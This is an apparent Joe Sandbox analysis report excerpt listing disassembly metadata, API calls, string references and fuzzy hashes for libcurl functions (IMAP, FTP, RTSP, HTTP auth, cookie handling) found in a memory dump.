                                                                                                                                  • _free.LIBCMT ref: 6B92F42F
                                                                                                                                  • _free.LIBCMT ref: 6B92F43A
                                                                                                                                  • _free.LIBCMT ref: 6B92F445
                                                                                                                                  • _free.LIBCMT ref: 6B92F450
                                                                                                                                  • _free.LIBCMT ref: 6B92F45B
                                                                                                                                  • _free.LIBCMT ref: 6B92F466
                                                                                                                                  • _free.LIBCMT ref: 6B92F474
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 6ba362d1c33963b78e6bcd553cb6be4a024a08be46f43a326bfe328e5bad686c
                                                                                                                                  • Instruction ID: 405518c592e1f54a98479a333393addb2f34109678ebe8e2c0f244f1582b36a2
                                                                                                                                  • Opcode Fuzzy Hash: 6ba362d1c33963b78e6bcd553cb6be4a024a08be46f43a326bfe328e5bad686c
                                                                                                                                  • Instruction Fuzzy Hash: 7821A47AD10108AFDB41DFB4D8A1EDE7BB9FF18248F0081A6F5159B125EB35EA45CB80
                                                                                                                                  Strings
                                                                                                                                  • SELECT %s, xrefs: 6B8F022F
                                                                                                                                  • Mime-Version, xrefs: 6B8F02C9
                                                                                                                                  • Cannot SELECT without a mailbox., xrefs: 6B8F01F2
                                                                                                                                  • Cannot APPEND without a mailbox., xrefs: 6B8F026C
                                                                                                                                  • Mime-Version: 1.0, xrefs: 6B8F02E1
                                                                                                                                  • Cannot APPEND with unknown input file size, xrefs: 6B8F0354
                                                                                                                                  • APPEND %s (\Seen) {%I64d}, xrefs: 6B8F0395
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.$Cannot SELECT without a mailbox.$Mime-Version$Mime-Version: 1.0$SELECT %s
                                                                                                                                  • API String ID: 0-2877092315
                                                                                                                                  • Opcode ID: 2637eb328f9a31fe0cd347dad4c9f563f9ff31facdd2029010169c1240b057fd
                                                                                                                                  • Instruction ID: c6a9611d5cd58cc3a6c9bec2c76ec9816e569d3968fe5f9af1a40337bdfc2cca
                                                                                                                                  • Opcode Fuzzy Hash: 2637eb328f9a31fe0cd347dad4c9f563f9ff31facdd2029010169c1240b057fd
                                                                                                                                  • Instruction Fuzzy Hash: A091E475E043149FEB118F64DC4179677ACAF013AAF0449B9EC089B241E73DA896CBF1
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(CSeq:,6B8EC3E5,00000005,?,?,?,?,?,6B8EC3E5), ref: 6B8FFD7E
                                                                                                                                  • curl_strnequal.LIBCURL(Session:,6B8EC3E5,00000008,6B8EC3E5), ref: 6B8FFDE8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: : %ld$CSeq:$Got RTSP Session ID Line [%s], but wanted ID [%s]$Got a blank Session ID$Session:$Unable to read the CSeq header: [%s]
                                                                                                                                  • API String ID: 482932555-1168109407
                                                                                                                                  • Opcode ID: 594da866a162260a1662e35a2f0509457b9f4d065b5d6777da247f559d950d9e
                                                                                                                                  • Instruction ID: 5c5f09f6d0ed8b6947d1a6d57e7a9a35574bbd8ac72b6f98934fea844314605e
                                                                                                                                  • Opcode Fuzzy Hash: 594da866a162260a1662e35a2f0509457b9f4d065b5d6777da247f559d950d9e
                                                                                                                                  • Instruction Fuzzy Hash: AF412976A0510426DB108E7DBC41BE73B9DDF962A9F0444B6EC4CCF203EA2AD516C6F1
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000100), ref: 6B90A0E7
                                                                                                                                  • _strncpy.LIBCMT ref: 6B90A12D
                                                                                                                                  • _strrchr.LIBCMT ref: 6B90A16D
                                                                                                                                  • _strrchr.LIBCMT ref: 6B90A188
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 6B90A1B3
                                                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 6B90A1C1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_strrchr$_strncpy
                                                                                                                                  • String ID: Unknown error %d (%#x)
                                                                                                                                  • API String ID: 1320708361-2414550090
                                                                                                                                  • Opcode ID: 502d45afbf67a73fbfaa0632ff6bbcf3f186894b81836e6e4dbd3c274c368940
                                                                                                                                  • Instruction ID: 67138b6325244a38c983fb58171b43ff430df59fce84d0afd51eb0aa8d926853
                                                                                                                                  • Opcode Fuzzy Hash: 502d45afbf67a73fbfaa0632ff6bbcf3f186894b81836e6e4dbd3c274c368940
                                                                                                                                  • Instruction Fuzzy Hash: C421D175E042186BDB116E75AC81B6F7BADEFA625DF1080ADEC0497241EF39D90182F2
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Uploading to a URL without a file name!, xrefs: 6B8DD5EB
                                                                                                                                  • Request has same path as previous transfer, xrefs: 6B8DD68E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr_strncpy$_strrchr
                                                                                                                                  • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
                                                                                                                                  • API String ID: 2378022753-131330169
                                                                                                                                  • Opcode ID: 76aefeeac5f20647ff5e6d0697878f0b1dfcdd474aed08b14d6330c4919ad9b1
                                                                                                                                  • Instruction ID: d07ab59b8ead30b5f64f17a0d188dd8ee90065a223fbd86b1a8ac58dce77f40d
                                                                                                                                  • Opcode Fuzzy Hash: 76aefeeac5f20647ff5e6d0697878f0b1dfcdd474aed08b14d6330c4919ad9b1
                                                                                                                                  • Instruction Fuzzy Hash: 8791F971A88216ABDB148F34D845B9A7BB5EF0234CF0045BAEC0D9B241EB3AE555CFD0
                                                                                                                                  APIs
                                                                                                                                  • curl_mfprintf.LIBCURL(?,%s,00000000), ref: 6B8D679A
                                                                                                                                  Strings
                                                                                                                                  • %s.%s.tmp, xrefs: 6B8D66C1
                                                                                                                                  • # Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 6B8D6707
                                                                                                                                  • ## Fatal libcurl error, xrefs: 6B8D67F5
                                                                                                                                  • %s, xrefs: 6B8D6792
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mfprintf
                                                                                                                                  • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                                                                                                                  • API String ID: 8901498-4087121635
                                                                                                                                  • Opcode ID: 48d88b35c28a51f3a46adcef805b1ac5eeea91dabca669a6d1f7ee4a6811baf7
                                                                                                                                  • Instruction ID: 2ce6d452fa3a9b8fbb1daae634591d0d129f53add980bee1443a2b5c1c3e457c
                                                                                                                                  • Opcode Fuzzy Hash: 48d88b35c28a51f3a46adcef805b1ac5eeea91dabca669a6d1f7ee4a6811baf7
                                                                                                                                  • Instruction Fuzzy Hash: 4461C6B5E4425D9BDF008FB89C927BF7BB49F46218F0408BADD05A7202DB3DD91587A1
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strstr
                                                                                                                                  • String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$RETR response: %03d
                                                                                                                                  • API String ID: 2882301372-2096918210
                                                                                                                                  • Opcode ID: 645043b5d9296f51a4ee9539608bb8f95cfd443e4ff50b6db515e8fab0ec83ce
                                                                                                                                  • Instruction ID: b7a4a30d037e951a5a26b7aca2c6d73ff612e7e4a05b8778671d001465196a5a
                                                                                                                                  • Opcode Fuzzy Hash: 645043b5d9296f51a4ee9539608bb8f95cfd443e4ff50b6db515e8fab0ec83ce
                                                                                                                                  • Instruction Fuzzy Hash: 6351F476D48244ABDB10CF68D840B9E77B5AB44324F008AEBEC2C9B291D7399544CF91
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E7987
                                                                                                                                  • inet_pton.WS2_32(00000002,00000000,?), ref: 6B8E79C4
                                                                                                                                  • inet_pton.WS2_32(00000017,00000000,?), ref: 6B8E79D5
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E79E2
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E79FA
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E7A2A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr$inet_pton
                                                                                                                                  • String ID: xn--
                                                                                                                                  • API String ID: 1785450883-2826155999
                                                                                                                                  • Opcode ID: 52626953298564ac974ee68f6d137e342f1bedf0798371d12087c309adaa4a3a
                                                                                                                                  • Instruction ID: 4d1e42ff086cc90a58a8fd85455392836f6058a00e8d94cd6f1dfab88a00d9f1
                                                                                                                                  • Opcode Fuzzy Hash: 52626953298564ac974ee68f6d137e342f1bedf0798371d12087c309adaa4a3a
                                                                                                                                  • Instruction Fuzzy Hash: C641EA79A4420E5BEF10CE78AD41BBD77ACDF5665CF0401ADDC09DB242EB29CA06D2B0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf
                                                                                                                                  • String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
                                                                                                                                  • API String ID: 3418963191-1262176364
                                                                                                                                  • Opcode ID: 20717b79f36620f974b38c2ecea1e7ca83ceb32a2bff85e4b647e03505679785
                                                                                                                                  • Instruction ID: 15230230bec12f3c81ff533df7d4a548972d7734a770ab33770cdd007f2c28c1
                                                                                                                                  • Opcode Fuzzy Hash: 20717b79f36620f974b38c2ecea1e7ca83ceb32a2bff85e4b647e03505679785
                                                                                                                                  • Instruction Fuzzy Hash: 3B413076B102346BDF104A68EC85F6AB7A9DB8576AF004977FD0DE7201D729DC4483E0
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8ED9E9
                                                                                                                                  • curl_maprintf.LIBCURL(%.*s,00000000,?,?,?,?,?,?,?,?,?,00000000,?,CONNECT,00000000,00000001), ref: 6B8ED9FE
                                                                                                                                    • Part of subcall function 6B8F48E0: curl_mvaprintf.LIBCURL(?,?,?,6B8D66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B8F48EA
                                                                                                                                  • curl_maprintf.LIBCURL(%sAuthorization: Digest %s,Proxy-,?), ref: 6B8EDA61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf$___from_strstr_to_strchrcurl_mvaprintf
                                                                                                                                  • String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
                                                                                                                                  • API String ID: 2694567262-3976116069
                                                                                                                                  • Opcode ID: e0a10287625a5bd63ee05ea27d46dac28d2096f32a0979cbd733ca0a6ed5a9ed
                                                                                                                                  • Instruction ID: b4270ebfb27f7a8f292f7d60cf764c0675b934f4c8287c3341346b8a7bb43c1f
                                                                                                                                  • Opcode Fuzzy Hash: e0a10287625a5bd63ee05ea27d46dac28d2096f32a0979cbd733ca0a6ed5a9ed
                                                                                                                                  • Instruction Fuzzy Hash: C7418275B04218AFDF00CFA8D881BAD7BF8EF46344F4484B9E808DB251E735DA558BA1
                                                                                                                                  APIs
                                                                                                                                  • curl_mime_data.LIBCURL(?,?,?), ref: 6B8F2917
                                                                                                                                  • curl_mime_filedata.LIBCURL(?,?), ref: 6B8F292A
                                                                                                                                  • curl_mime_data_cb.LIBCURL(?,?,?,?,?,?,?), ref: 6B8F2955
                                                                                                                                  • curl_mime_init.LIBCURL ref: 6B8F2963
                                                                                                                                  • curl_mime_subparts.LIBCURL(?,00000000), ref: 6B8F2976
                                                                                                                                  • curl_mime_addpart.LIBCURL(00000000), ref: 6B8F299D
                                                                                                                                  • curl_slist_free_all.LIBCURL(00000000,?), ref: 6B8F2A1B
                                                                                                                                  • curl_slist_free_all.LIBCURL(?,?), ref: 6B8F2A44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_free_all$curl_mime_addpartcurl_mime_datacurl_mime_data_cbcurl_mime_filedatacurl_mime_initcurl_mime_subparts
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3177825088-0
                                                                                                                                  • Opcode ID: 870f7e50911d0b6e857151ca31a0bf9c48e2b0d095dbab0debe01f03aebc4c72
                                                                                                                                  • Instruction ID: c22c6f4d22d9b488bf99597b6ef29eecdc46d9152cf043875bcb80d550872748
                                                                                                                                  • Opcode Fuzzy Hash: 870f7e50911d0b6e857151ca31a0bf9c48e2b0d095dbab0debe01f03aebc4c72
                                                                                                                                  • Instruction Fuzzy Hash: 0B51F876A00565ABDF108F28E88195A7768FF05394B0405B8FD099B701E73EED32DBD2
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strrchrcurl_maprintf
                                                                                                                                  • String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - Parsing started$Wildcard - START of "%s"
                                                                                                                                  • API String ID: 1669751406-1301414817
                                                                                                                                  • Opcode ID: 68dcda977bea72720c9013a552802f19c985d1daa28c10582787cab980375dc8
                                                                                                                                  • Instruction ID: fd93a2d1bf4b1df6e060e4bba5702887247a3c8d118028aa43f85b566c46057c
                                                                                                                                  • Opcode Fuzzy Hash: 68dcda977bea72720c9013a552802f19c985d1daa28c10582787cab980375dc8
                                                                                                                                  • Instruction Fuzzy Hash: 41C1B275A006049FDB10CF68D882BC6BBE1FF46315F1448BAE95DCB210EB79E586CB61
                                                                                                                                  APIs
                                                                                                                                  • curl_url_get.LIBCURL(?,00000008,?,00000040), ref: 6B8F005B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_url_get
                                                                                                                                  • String ID: MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
                                                                                                                                  • API String ID: 1525506501-2060961330
                                                                                                                                  • Opcode ID: dc6d1dc3e6bb91c30610e095a09d82029b58d3391e3d0ac100a290eca3f7502f
                                                                                                                                  • Instruction ID: eaaaaebb0700b67b2d7443479d69b32c36fd03a79f8d04384f8ac7cd01505d45
                                                                                                                                  • Opcode Fuzzy Hash: dc6d1dc3e6bb91c30610e095a09d82029b58d3391e3d0ac100a290eca3f7502f
                                                                                                                                  • Instruction Fuzzy Hash: 13911974E04245AFFB10CE24E851B697BB8AF52349F0048EDEC588B642DB3ADA55C7F1
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%sAuthorization: Negotiate %s,Proxy-,00000000,?,?,00000000,?), ref: 6B8EDF14
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$HTTP$Negotiate auth restarted$Proxy-
                                                                                                                                  • API String ID: 3307269620-819322280
                                                                                                                                  • Opcode ID: a6d97043fa1493b628b9f33369ec7383e8265c1613ab3c0b3ae170f567fd6433
                                                                                                                                  • Instruction ID: f55cba6aa0bc07a7d3bca0f2606291db5f9b8ad0c22e304d38b9764f88ee515c
                                                                                                                                  • Opcode Fuzzy Hash: a6d97043fa1493b628b9f33369ec7383e8265c1613ab3c0b3ae170f567fd6433
                                                                                                                                  • Instruction Fuzzy Hash: 3391F875A042199FDB11CF68C880BDABBF5EF86318F0444A9D848D7200D77AE959CBA1
                                                                                                                                  APIs
                                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B8DD874
                                                                                                                                  Strings
                                                                                                                                  • *, xrefs: 6B8DD849
                                                                                                                                  • FTP response aborted due to select/poll error: %d, xrefs: 6B8DD87B
                                                                                                                                  • We got a 421 - timeout!, xrefs: 6B8DD81E
                                                                                                                                  • FTP response timeout, xrefs: 6B8DD8BA
                                                                                                                                  • QUOT string not accepted: %s, xrefs: 6B8DD89F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: *$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$We got a 421 - timeout!
                                                                                                                                  • API String ID: 1452528299-2335292235
                                                                                                                                  • Opcode ID: 02cf3b28e0e3292d7784a0c97c824cd95dfcebfb6251aa5a87defcf42219c11e
                                                                                                                                  • Instruction ID: 6be69996089d7e9c2e2724bedf1b015ef577ce1af1f302ff4fde97729b47e1f9
                                                                                                                                  • Opcode Fuzzy Hash: 02cf3b28e0e3292d7784a0c97c824cd95dfcebfb6251aa5a87defcf42219c11e
                                                                                                                                  • Instruction Fuzzy Hash: 48510436F44208AFEF018E6CDC41BAE7BB5EB45319F0049BAED18D7291EB3995418B91
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%c%c%c%c,?,?,?,?), ref: 6B8D1B38
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%c%c%c=,?,?,?), ref: 6B8D1B5D
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%c%c==,?,?), ref: 6B8D1B79
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
